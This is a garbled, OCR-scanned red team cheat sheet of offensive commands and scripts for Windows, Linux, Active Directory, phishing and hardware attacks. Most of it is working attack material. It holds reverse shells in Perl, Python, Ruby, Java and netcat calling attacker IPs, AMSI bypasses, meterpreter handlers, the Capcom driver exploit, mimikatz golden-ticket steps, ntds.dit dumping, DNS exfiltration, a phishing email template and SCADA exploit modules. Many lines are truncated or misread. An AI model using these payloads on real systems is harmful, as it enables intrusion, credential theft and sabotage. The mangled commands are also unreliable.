Red Team Guides
Red Team Guides
IO
whoami
sudo apt install gss-ntlmssp
sudo apt-get install powershell
pwsh
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Cre
Enter-PSSession $offsec_session
for x in {1 .. 254 .. l};do ping -c 1 1.1.1.$x lgrep "64 b" lcut -d" "-f4 ips.txt; done
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l}; do
host $range.$ip lgrep " name pointer " lcut -d"
done
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while
$i -le 253 l
do
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
else
echo "IP NOT BANNED: 192.168.1.$i"
fi
i='expr $i +1`
done
https://github.com/rebootuser/LinEnum
Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
https://github.com/DominicBreuker/pspy
For example: ./pspy64 -pf -i 1000
/Users/<username>/Library/Preferences/.GlobalPreferences.plist
/Users/<username>/Library/Preferences/
%SystemDrive%\wmiOWS\Start Menu\Programs\Startup
netsh advfirewall set currentprofile state off netsh advfirewall set allprofiles state of
--OR--
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal Server" /v fDenyTS
wmic /node: targetiP /user:domain\user /password:password process call create "\ \ smbiP
https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
. .\AMSI-Bypass.ps1
Invoke-AmsiBypass
(new-object sjstem.net.webclient).downloadFile(''url'',''dest'')
− ://192.168.2. / . − − . e
Script will send a file ($filepath) via http to server ($server) via POST request.
Must have web server listening on port designated in the $server
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse https
4. set LHOST 1. 1. 1. 1
5. set LPORT 443
6. exploit -j
1. c:\powershell
2. PS c:\ $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\ $u = [System.Text.Encoding]: :Unicode.GetBytes($crnd)
4. PS c: \ $e = [Convert] ::ToBase64String($u)
5. PS c:\ $e
6. Copy contents of $e
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1
HKLM\Software\Microsoft\Windows NT\CurrentVersion
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v
ProductNarne
HKLM\System\CurrentControlSet\Control\TimeZoneinformation /v ActiveTirneBias
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive
MRU
HKLM\System\MountedDevices
HKLM\System\CurrentControlSet\Enurn\USBStor
HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters -
IPEnableRouter = 1
HKLM\Security\Policy\PolAdTev
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services
HKLM\Software
HKCU\Software
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisite
dtmu & \Opensavetmu
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKeY
for /L %i
1.1.1.%i
in (2,1,254) do (netsh interface ip set address local static
netrask gw ID %1 ping 127.0.0.1 -n l -w 10000 nul %1)
SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD
MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN/user /RP
password
smbclient -N -L 10.10.10.10
smbclient -L 10.10.10.10
smbclient //10.10.10.10/forensic
smbclient //10.10.10.10/profiles$
queryuser support
enumdomusers
enumprivs
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
.\SharpHound.exe
or
SharpHound.exe -c All --zipfilename output.zip
https://github.com/NetSPI/PowerUpSQL/blob/master/PowerUpSQL.ps1
. .\PowerUpSQL.ps1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
.\Rubeus.exe asreproast
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up.
https://github.com/sperner/PowerShell/blob/master/PortScan.ps1
.\PortScan.ps1
.\PortScan.ps1 10.10.10.10 1 10000
− −
. _ −u
. − " \ " :\ \ \ . e
Given: 1.1.1.101/28
/28 = 255.255.255.240 netmask
256 - 240 = 16 = subnet ranges of 16, i.e.
1.1.1.0
1.1.1.16
1.1.1.32 ...
Range where given IP falls: 1.1.1.96 - 1.1.1.111
fe80:: -link-local
2001:: - routable
::a.b.c.d- IPv4 compatible IPv6
::ffff:a.b.c.d- IPv4 mapped IPv6
responder -I eth1 -v
nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2"
"$3)=="Nmap scan report")print$5" "$6}' | sed 's/(//g' I sed 's/)//g'
dns.txt
smbclient -U USERNAME -L IP
1.
nc -lvnp 80
2.
while reading mail; do swaks --to $mail --from [email protected] --header "Subject: Cre
E " b d " t htt //10 10 10 19/" 10 10 10 10 d il t t
vncpwd.exe <ENCRYPTEDPASSWORD>
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password
TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
HKLM\SOFTWARE\TightVNC\Server\ControlPassword
tightvnc.ini
vnc_viewer.ini
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
ssh <target>
nmap -p 22 <target> -
curl http://<target> -
nmap -p 80 <target>
dirb http://<target>
curl https://<target>
sslscan <target>:443
ftp <target>
nmap -p 21 <target>
telnet <target> 25
nmap -p 25 <target>
nslookup <target>
nmap -p 53 <target>
dnsrecon -d <target>
rdesktop <target>
nmap -p 3389 <target>
vncviewer <target>
Attacker:
1. Capture DNS exfil packets
tcdpump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d'
cut -f1 -d'.' | uniq received. txt
3. Reverse the hex encoding
xxd -r -p received~.txt kefS.pgp
perl -e 'use Socket; $i="10.0.0.l"; $p=1234; socket (S, PF INET, SOCK STREAM,
getprotobjname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN," &S") ;open(STDOUT," &S"); open(STDERR," &S"); exec("/bin/sh" -i");};'
#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
You have new mail in /var/mail/waldo
import os
import pty
import socket
lhost = "10.10.10.10"
lport = 4444
ZIP_DEFLATED = 0
class ZipFile:
def close(*args):
return
def __init__(self, *args):
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
by -rsocket -e 'exit if
fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd, " r
") {| io|c.print io.read}end'
ruby -rsocket -e
'c=TCPSocket.new("attackerip","4444");while(crnd=c.gets);IO.popen{cmd,"r" ) {|
io|c.print io.read}end'
sudo - I
python -c 'import pty; pty. spawn("/bin/bash”)’
sudo -u webadmin vi
ESC +:+ !/bin/sh
bash - i
whoami
try ctrl + z
stty raw -echo
fg
echo os.system('/bin/bash')
/bin/sh -i
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
cmd="whoami"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\
./docket-socket-expose.sh
in attacker host
1. git clone https://github.com/saghul/lxd-alpine-builder.git
2. ./build-alpine
in victim host
3. Download built image
4. import ./alpine-v3.12-x86_64-20200621_2005.tar.gz --alias attacker
5. lxc init attacker tester -c security.privileged=true
6. lxc exec tester/bin/sh
SharpWSUS.exe create /payload:"C:\Users\user\Desktop\PsExec64.exe" /args:"-acceptula -s -
SharpWSUS.exe approve /updateid:<id> /computername:dc.domain.dev /groupname:"title"
journalctl
!/bin/sh
sudo journalctl
!/bin/sh
Ctrl+R + Ctrl+X
reset; sh 1>&0 2>&0
Ctrl+W
/etc/shadow
:!/bin/sh
$user = "megacorp\jorden"
$folder = "C:\Users\administrator"
$acl = get-acl $folder
$aclpermissions = $user, "FullControl", "ContainerInherit, ObjectInherit", "None", "Allow
$aclrule = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermissions
$acl.AddAccessRule($aclrule)
set-acl -path $folder -AclObject $acl
get-acl $folder | folder
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
https://github.com/dievus/printspoofer
printspoofer.exe -i -c "powershell -c whoami"
1. priv.txt contain
SET CONTEXT PERSISTENT NEWSWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
2. exec with diskshadow /s priv.txt
FIRST:
Download https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Download https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploadd
Download https://github.com/tandasat/ExploitCapcom
change ExploitCapcom.cpp line 292
TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
to
TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
then compile ExploitCapcom.cpp and eoploaddriver.cpp to .exe
SECOND:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell
2. .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
3. .\ExploitCapcom.exe
4 i f ` `
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity user1 -verbose
Enter-PSSession -ComputerName COMPUTERNAME -Credential “”
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_
. .\Heidi.ps1
Invoke-SQLOCmd -Verbose -Command “net localgroup administrators user1 /add” -Instance COM
1.mimikatz# token::elevate
2.mimikatz# vault::cred /patch
3.mimikatz# lsadump::lsa /patch
4.mimikatz# kerberos::golden /user:Administrator /rc4:<Administrator NTLM(step 3)> /domai
5. powercat -l -v -p 443
6.schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" /TN "enterprise" /TR "p
7.schtasks /run /s DOMAIN /TN "enterprise"
Via SMB:
1. From the compromised machine, share the payload folder
2. Set sharing to 'Everyone'
3. Use psexec or wmic command to remotely execute payload
Via WebDAV:
1. Launch Metasploit 'webdav file server' module
2. Set the following options:
localexe = true
localfile= payload
localroot= payload directory
disablePayloadHandler=true
3. Use psexec or wmic command to remotely execute payload
psexec \\ remote ip /u domain\compromised_user /p password "\\payload
ip \test\msf.exe"
OR -
wmic /node: remote ip /user:domain\compromised user //password:password
process call create "\\ payload ip \test\msf.exe"
On redirector (1.1.1.1):
socks.exe -i1.1.1.1 -p 8C80
Attacker:
Modify /etc/proxjchains.conf:
Comment out: #proxy_dns
Comment out: #socks4a 127.0.0.1 9050
Add line: socks4 1.1.1.1 8080
Scan through socks proxy:
proxychains nmap -PN -vv -sT -p 22,135,139,445 2.2.2.2
On attacker (client):
Modify /stunnel.conf
clien = yes
[netcat client]
accept = 5555
connect = -Listening IP-:4444
On attacker (client):
# nc -nv 127.0.0.1 5555
telnet ip
#Enter 1 char, get uname:pwd
http://ip/getsecure.cgi
http://ip/er_a_rc1.htm
http://ip/a_security.htm
http://ip/a_rc.htm
http://ip/snapctrl.ssi
http:// ip /commard/visca-gen.cgi?visca=str
8101046202FF : Freeze Camera
https://htbmachines.github.io/
1)
nc -nvlp 999
2)
Visit http://10.1.3.1:1234/script/console
String host="192.168.2.x";
int port=999;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(
Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputS
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0
()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush()
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
/etc/krb5.conf
/var/lib/jenkins/adm_domain.keytab
proxychains secretsdump. py -no -pass -just -dc -user adm_domain -debug -dc -ip 10.1.1.2
proxychains secretsdump. py -k -no -pass -debug -dc -ip 10.1.1.2 adm_domain@OPS -CHILDDC
1)
download & edit PowerShellTcpOneLine.ps1
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
2)
schtasks /create /S atomic -dc.atomic.site /SC Weekly /RU "NT Authority \SYSTEM" /TN "war
3)
nc -nlvp 7779
4)
schtasks /Run /S atomic-dc. atomic. site /TN "warfare"
( − . ). (′ ://192.168.2. / − . 1′); −
" : : "
. − − ∶ 49927 1 5 335 681 95 3 45 2 / @
( − . ). (′ ://192.168.2.2/ _ . 1′)
− | ? {$_. − ′ ′} | %{ − − − $_.
1)
− | ? {$_. − ′ ′} | %{ − − − $_.
3)
− − . | % { $_. } | − − .
p
= " / "
$script = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('J
$bytes = [System.Text.Encoding]::Unicode.GetBytes($script)
for ($i = 0; $i -lt $bytes.Length; $i++) {
if (($bytes[$i] -eq 0x41) -and ($bytes[$i+1] -eq 0x6D) -and ($bytes[$i+2] -eq 0x73) -
$bytes[$i+0] = 0x42; $bytes[$i+1] = 0x6D; $bytes[$i+2] = 0x73; $bytes[$i+3] = 0x6
}
}
[System.Reflection.Assembly]::Load($bytes)
$amsi = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiIn
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed
nmap -sP -n -oX out.xml 1.1.1.0/24 2.2.2.0/24 | grep "Nmap" | cut -d " " -f
5 live hosts.txt
and OR &&
or OR ||
xor OR ^^
not OR!
Connect to [TargetiP] Listener on [port]:
$ nc [Target P] [port]
Start Listener:
$ nc -1 -p [port]
send file
nc.exe 10.10.10.10 < "file.log"
download file
nc -vnlp 1234 > file.txt
Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe
-- OR --
# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst=attackerip :1234) :no-sout-rtp-sap :no-soutstandard-
sap :ttl=1 :sout-keep
-- OR --
xhost+
vi -/.ssh/config- Ensure 'ForwardXll yes'
ssh -X [email protected]
sqlmap.py -r req.txt
/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml
use incognito
list tokens -u
impersonate token domain\\user
ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine file.exe
GRUB Henu: Add 'single' end of kernel line. Reboot. Change root password. reboot
$ john --format=sapg
ROOT $1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
username:ROOT
$1194E38F1489F3F8DA18181F14DE8-0E-8DCC239
$ john --format=sha1-gen
$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb"453dfe30-89
username:$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb-453dfe30-89
$ john --format=zip
$zip$'0'1'8005b1b"d07""08d'dee4
username:$zip$'0'1'8005b1b-d0"-"08d'dee4
#Add lower(@), upper(,), ~umber(%), and symbol(^) I to the end of the word
crunch 12 12 -t baseword@,%^ wordlist.txt
Use custom special character set and add 2 numbers then special character
maskprocessor -custom-charset1=\!\@\#\$ baseword?d?d?l wordlist.txt
1. Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
2. Create a new Shadow Copj
a. cscript vssown.vbs /start (optional)
b. cscript vsown.vbs /create
3. Pull the following files frorr. a shadow copj:
a. Copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
ntds\ntds.dit.
b. copj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
System32\config\SYSTEM.
C. COpj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\
system32\config\SAM.
4. Copj files to attack box.
5. Download tools: http://www.ntdsx~ract.com/downloads/ntds dump_hash.zip
6. Configure and Make source code for libesedb from the extracted package
a. cd libesdb
b. chmod +x configure
c. ./configure && make
Use esedbdumphash to extract the data table from ntds.dit.
a. cd esedbtools
b. . I esedbdumphash ../../ntds.dit
MD5 16 bytes
SHA-1 20 bytes
SHA-256 32 bytes
SHA-512 64 bytes
http://isc.sans.edu/tools/hashsearch.html
# dig +short md5 .md5.dshield.org TXT
Result = "filename I source" i.e. "cmd.exe I NIST"
http://www.team-cymru.org/Services/MHR
# dig +short [MD5|SHA-1].malware.hash.cymru.com TXT
Result = last seen timestamp AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ), "\n"'
https://fileadvisor.bit9.com/services/search.aspx
https://www.virustotal.com/#search
./ −
./ − − / /
curl ftp://user:[email protected]/directory/
curl http://bob.com/file[l-10].txt
The steps below will clone a website and redirect after 3 seconds to
another page requiring basic authentication. It has proven very useful for
Collecting credentials during social engineering engagements.
Install dependencies:
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0 rc1-
static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0 rc1-statlc-i386.tar.bz2
cp wkhtmltoimage-i386 /usr/local/bin/
Installation Dependencies:
Download Phantomjs
https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86_64.tar.bz2
Download PeepingTom
git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git
Extract and copy phantomjs from phantomjs-1.9.2-linux-x86 64.tar.bz2 and
copy to peepingtom directory
Run PeepingTom
python peepingtom.py http:// mytarget.com
https://crt.sh/
و
https://github.com/TheBinitGhimire/Web-Shells
1- find structure
python2.7 ds_store_exp.py http://poo.htb/.DS_Store
2-enum in found path
java -jar iis_shortname_scanner.jar 2 20 http://poo.htb/dev/dca66d38fd916317687e1390a420c
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikp
Or
import socket as sk
for port in range (1, 1024):
try:
s=sk. socket (sk. AF _ INET, sk. SOCK_ STREAM)
s.settimeout(1000)
s. connect ( (' 127. 0. 0. 1 ' , port) )
print '%d:OPEN' % (port)
s.close
except: continue
#!/usr/bin/pjthon
import base64
filel=open("pwd.lst","r")
file2=open("b64pwds.lst","w")
for line in file1:
clear= "administrator:"+ str.strip(line)
new= base64.encodestring(clear)
file2.write(new)
import glob, re
for msg in glob.glob('/tmp/.txt'):
filer = open((msg), 'r')
data = file.read()
message= re.findall(r' message (.'?) /message ', data, re.DOTALL)
print "File %s contains %s" % (str(msg), message)
fi1er.c1ose()
#Create httpserver.pj
import BaseHTTPServer, SimpleHTTPServer, ssl
cert="cert.pem"
httpd = BaseHTTPServer.HTTPServer( ('192.168.1.10' ,443),
Simp1eHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap socket(httpd.socket,certflle=cert,server side=True)
httpd.serve_forever()
python -m SimpleHTTPServer 8080
#!/usr/bin/python
import smtplib, string
import os, time
os.system("/etc/init.d/sendmail start")
time.sleep(4)
HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TO = "[email protected]"
FROM= "[email protected]"
TEXT = "Message Body"
BODY = string.join( (
"From: %s" % FROH,
"To: %s" % TO,
"Subject: %s" % SUBJECT ,
"",
TEXT
) , "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server. quit ()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")
#!/usr/bin/python
import urllib2, os
if os.path.exists("/tmp/cb.sh"):
os.system("chmod 700 /tmp/cb.sh")
os. system ( "/tmp/cb. sh")
#!/usr/bin/python
import urllib2, sys, time
parser = OptionParser()
parser.add option{''-t'', dest=''iprange'', help=''target IP range, i.e.
192.168.1.1-25")
parser.add option(''-p'', dest=''port'',default=''80'',help=''port, default=BO'')
parser.add=option("-d", dest="delay",default=".5",help="delay (in seconds),
default=.5 seconds")
if opts.iprange is None:
parser.error("you must supply an IP range")
ips = []
headers={}
for i in range(int(start),int(stop)+1):
ips.append('%s.%s.%s.%d' % (octets[O],octets[1] ,octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips:
try:
response= urllib2.urlopen('http://%s:%s' % (ip,opts.port))
headers[ip] = dict(response.info())
except Exception as e:
headers[ip] = "Error: " + str(e)
time.sleep(float(opts.delay))
ip=IP(src="ip", dst="ip")
u=UDP(dport=1234, sport=5678)
pay = "my UDP packet"
packet=ip/u/pay
packet.show()
wrpcap ("out.pcap",packet):write to pcap
send(packet)
packet=IP(src="ip" ,dst="ip")/UDP(dport=l23)/fuzz(NTP(version=4,mode=4))
http://www.radioreference.com/apps/db/
iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0
jd-gui
https://problemkaputt.de/no$gba.zip
https://mgba.io/downloads.html
https://github.com/SiD3W4y/GhidraGBA
file <filename>
cat password | xor 0xff > password.bin
https://asecuritysite.com/encryption/ferdecode
https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard
http://dl.djsoft.net/DTMFChecker.zip
https://www.dcode.fr/prime-numbers-cipher
https://www.dcode.fr/cistercian-numbers
https://www.dcode.fr/code-multitap-abc
http://rumkin.com/tools/cipher/atbash.php
https://www.dcode.fr/vigenere-cipher
echo "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTk
steghide info <filename> -p <password>
steghide extract -sf <filename> -p <password>
https://www.dcode.fr/binary-image
https://online-barcode-reader.inliteresarchy.com/
binwalk -e <file>
strings <file>
stage('Build') {
steps {
sh 'sudo <command>'
}
}
sudo /bin/bash
./exploit
aws s3 mb s3://my-bucket-name
az vm list -g my-resource-group
Social media
Caller ID spoofing
Phishing emails
Pretexting kits
Subject: Urgent: Security Alert
Body:
Dear [Target],
We have detected suspicious activity on your account and need to verify your information
Sincerely,
[Legitimate-Sounding Sender Name]```
Remember to replace the [Spoofed Email Address], [Target], [Malicious Link], and [Legitim
./gophish
setoolkit --campaign=spearphish
setoolkit --campaign=webattack
setoolkit --campaign=credential_harvester
setoolkit --campaign=smsSpoofing
beef-xss
beef -c /path/to/config.yaml
beef -p 8080
evilginx templates
evilginx log
evilginx test [phishing_template] [email_address]
import RPi.GPIO as GPIO
import time
# Main program
while True:
authorized_person = input("Please swipe your access card: ")
if is_authorized(authorized_person):
open_door()
time.sleep(5)
close_door()
else:
print("Access denied.")
vnc country: [two letter country code]
use auxiliary/scanner/vnc/vnc_login
set rhosts [target IP address]
set user_file [path to username file]
set pass_file [path to password file]
run
hping3 -S 192.168.1.0/24
vinagre -c "rdp://username:password@rdp-server"
"title:PRTG inurl:/index.htm?tabid=0&sort=Errors&filter_status=-1"
msfconsole -q
use exploit/windows/http/prtg_authenticated_rce
set RHOST 192.168.1.10
set RPORT 80
set LHOST 192.168.1.20
set LPORT 4444
set TARGETURI /
run
"port:502 modbus"
"port:44818"
"port:1911
"port:102
"port:20000"
use exploit/windows/scada/s7comm_plus_wincc_opc
use exploit/windows/scada/modbus_write_registers
cat cpub-iexplore-QuickSessionCollection-CmsRdsh.rdp
wget http://target.com/file
nikto -h target.com
https://github.com/dustinbrunton/MQTTInspector
filter: zbee
https://github.com/securing/gattacker
filter: btatt
file <bin>
strings
strings -n5 <bin>
strings -n16 <bin>#longer than 16
strings -tx <bin> #print offsets in hex
binwalk <bin>
hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head # might find signatures in header
fdisk -lu <bin> #lists a drives partition and filesystems if multiple
binwalk -E <bin>
screen /dev/ttyUSB0 115200 (connect to UART interface with baud rate of 115200)
cu -l /dev/ttyUSB0 -s 115200 (connect to UART interface with baud rate of 115200)
Use GNU Radio to capture and replay the signal. Alternatively, use specialized tools like
urh --modulation lora --rate [bandwidth] --frequency [frequency] --tx --duration [time_in
hackrf_transfer -t filename.bin -f [nearby_frequency] -s sample_rate -a 1 -x 40
void setup() {
// Start the keyboard
DigiKeyboard.delay(2000); // wait for 2 seconds
DigiKeyboard.sendKeyStroke(0); // windows key
DigiKeyboard.delay(1000);
DigiKeyboard.print("cmd"); // open command prompt
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("echo Hello World!"); // type command
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("exit"); // exit command prompt
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {
}
#include <SPI.h>
#include <RH_RF69.h>
void setup() {
Serial.begin(9600);
while (!Serial);
pinMode(RFM69_RST, OUTPUT);
digitalWrite(RFM69_RST, LOW);
delay(10);
digitalWrite(RFM69_RST, HIGH);
delay(10);
if (!rf69.init()) {
Serial.println("RFM69 module initialization failed!");
while (1);
}
rf69.setFrequency(RF69_FREQ);
Serial.println("RFM69 module initialized successfully!");
}
void loop() {
uint8_t data[] = "Hello World!";
rf69.send(data, sizeof(data));
rf69.waitPacketSent();
Serial.println("Data sent successfully!");
delay(1000);
}
#include <RH_RF95.h>
#define RFM95_CS 10
#define RFM95_RST 9
#define RFM95_INT 2
void setup() {
pinMode(RFM95_RST, OUTPUT);
digitalWrite(RFM95_RST, HIGH);
delay(100);
digitalWrite(RFM95_RST, LOW);
delay(10);
digitalWrite(RFM95_RST, HIGH);
delay(10);
if (!rf95.init()) {
Serial.println("LoRa radio init failed");
while (1);
}
rf95.setFrequency(915.0);
rf95.setTxPower(23, false);
}
void loop() {
char radiopacket[20] = "Hello, world!";
rf95.send((uint8_t *)radiopacket, strlen(radiopacket));
rf95.waitPacketSent();
delay(1000);
}
#include <SPI.h>
#include <MFRC522.h>
#define SS_PIN 10
#define RST_PIN 9
MFRC522 rfid(SS_PIN, RST_PIN); // Create instance of the RFID reader module
void setup() {
Serial.begin(9600); // Initialize serial communication
SPI.begin(); // Initialize SPI communication
rfid.PCD_Init(); // Initialize RFID reader module
}
void loop() {
if (rfid.PICC_IsNewCardPresent() && rfid.PICC_ReadCardSerial()) { // Check if a new RFI
Serial.print("Tag UID: ");
for (byte i = 0; i < rfid.uid.size; i++) { // Loop through the tag data and display i
Serial.print(rfid.uid.uidByte[i] < 0x10 ? "0" : "");
Serial.print(rfid.uid.uidByte[i], HEX);
}
Serial.println();
